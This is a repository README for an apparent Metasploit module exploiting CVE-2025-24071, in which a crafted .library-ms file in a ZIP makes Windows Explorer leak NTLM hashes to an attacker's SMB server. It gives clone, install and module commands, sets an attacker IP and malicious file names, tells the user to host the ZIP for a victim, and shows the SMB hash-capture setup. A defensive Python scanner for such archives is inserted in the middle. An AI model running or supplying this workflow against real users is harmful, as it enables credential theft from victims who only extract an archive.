Metasploit module for the CVE-2025-24071

## CVE-2025-24071: NTLM Hash Leak via .library-ms File (Metasploit Module)
This repository contains a **Metasploit module** to exploit CVE-2025-24071, a vulnerability in Windows Explorer that leaks NTLM hashes when a malicious `.library-ms` file is extracted from a ZIP archive.
Developed by: **FOLKS-IWD**
---
## **Overview**
The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted `.library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any further user interaction beyond the extraction.
This Metasploit module:
1. Generates a malicious `.library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
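
A defensive check for the behaviour described above, as an added example that is not part of this repository: it scans a ZIP archive, before extraction, for `.library-ms` entries that reference a UNC path. The function names, the 1 MiB read cap and the sample archive (placeholder bytes, not a valid library file) are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# UNC path: two backslashes, a host, one backslash, a share name.
UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\([^\\<>\s\"]+)")
MAX_ENTRY_BYTES = 1024 * 1024  # assumption: library files are small; cap reads


def _candidate_texts(raw):
    """Yield the raw bytes plus a UTF-16 to UTF-8 transcoding, if it decodes."""
    yield raw
    try:
        yield raw.decode("utf-16").encode("utf-8")
    except UnicodeError:
        pass


def scan_zip(data):
    """Return sorted (entry_name, host, share) for UNC paths in .library-ms entries."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            with zf.open(info) as fh:
                raw = fh.read(MAX_ENTRY_BYTES)
            for text in _candidate_texts(raw):
                for host, share in UNC_RE.findall(text):
                    findings.add((info.filename, host.decode(), share.decode()))
    return sorted(findings)


def build_sample_zip():
    """Constructed sample: placeholder bytes, not a valid library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Report.LIBRARY-MS", b"<placeholder>\\\\192.0.2.10\\shared</placeholder>")
        zf.writestr("docs/wide.library-ms", "\\\\files.example.test\\team".encode("utf-16"))
        zf.writestr("docs/local.library-ms", b"<placeholder>C:\\Users\\Public</placeholder>")
        zf.writestr("notes.txt", b"\\\\192.0.2.10\\shared")
    return buf.getvalue()


if __name__ == "__main__":
    for name, host, share in scan_zip(build_sample_zip()):
        print(f"{name}: references \\\\{host}\\{share}")
```

A finding means the archive would point Explorer at that host on extraction, so the archive can be quarantined instead of unpacked.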

---
## **Installation**
1. Clone the repository:
```bash
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
```
2. Copy the module to your Metasploit modules directory:
```bash
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
```
## **Usage**
1. Load the module:
```bash
use auxiliary/server/ntlm_hash_leak
```
2. Set the required options:
```bash
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
```
3. Run the module:
```bash
run
```
4. The module will generate a malicious ZIP file (`exploit.zip`). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:
```bash
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run
```